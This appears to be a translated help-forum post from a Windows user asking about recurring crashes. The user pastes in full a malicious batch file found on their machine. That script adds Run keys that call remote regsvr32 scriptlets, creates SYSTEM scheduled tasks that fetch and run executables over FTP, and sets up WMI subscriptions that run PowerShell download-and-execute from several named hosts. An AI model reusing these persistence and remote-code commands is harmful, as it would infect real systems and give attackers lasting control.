Windows

Where does this task come from?

Hello. The second day I can not work at all. It seems that I didn’t install anything, the window crashes all the time where the message is written "Cannot find C:\\ProgramData\temp\rtx.exe.
I went to the folder ":C:\\ProgramData\temp\" there is a 1start.bat file with the following content:
"reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i: js.webpublicservices.org:280/v1.sct scrobj.dll" / f
reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i: js.ha7455h6fi1.net:280/v1.sct scrobj.dll" / f
reg delete HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run /v "Realtek HD Audio"

schtasks /create /tn "AdobeUpdateFlac" /tr "cmd /c echo open ftp.ha7455h6fi1.net>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe" /ru "system" /sc onstart /F
schtasks /create /tn "AdobeUpdateFlac2" /tr "cmd /c echo open ftp.ha7455h6fi1.net>ps&echo test >>ps&echo 1433>>ps&echo get c.rar c:\windows\help\AdobeFlac.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\AdobeFlac.exe" /ru "system" /sc onstart /F

schtasks /create /tn "OSUpdate" /tr "cmd /c echo open ftp.webpublicservices.org>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F
I deleted via regeditthis task. Removed from Task Scheduler. It seemed to work. I'm going in today. It began to fly out every 5-10 seconds that window. What to do?

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="adobflac3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 13000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="adobflac4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' wmi.geaohgoehagugeh.ru: 8080/power.txt ')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' ha7455h6fi1.net:8096/power.txt ')||powershell.exe IEX (New-Object system.Net.WebClient). DownloadString(' ha7455h6fi1.net:8204/power.txt ')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' wmi.webpublicservices.org:8205/power.txt ')||powershell .exe IEX (New-Object system.Net.WebClient).DownloadString(' ha7455h6fi1.net:8095/power.txt ')||regsvr32 /u /s /i:ha7455h6fi1.net:8204/s.txt scrobj.dll®svr32 /u /s /i: ha7455h6fi1.net:8205/s.txt scrobj.dll®svr32 /u /s /i: wmi.webpublicservices.org:8221/s.txt scrobj.dll®svr32 /u /s /i: ha7455h6fi1.net:8096/s.txtscrobj.dll®svr32 /u /s /i: ha7455h6fi1.net:8095/s.txt scrobj.dll®svr32 /u /s /i: wmi.geaohgoehagugeh.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:\" http://ha7455h6fi1.net:8220/s.xsl\ ""

cmd /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"adobflac3\"", Consumer= "CommandLineEventConsumer.Name=\"adobflac4\""

taskkill /f /im taskhostw.exe
taskkill /f /im winlogon.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhostw.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
cacls c:\ProgramData\RealtekHD\winlogon.exe /e /d system
cacls c:\ProgramData\RealtekHD\taskhostw.exe /e /d system
"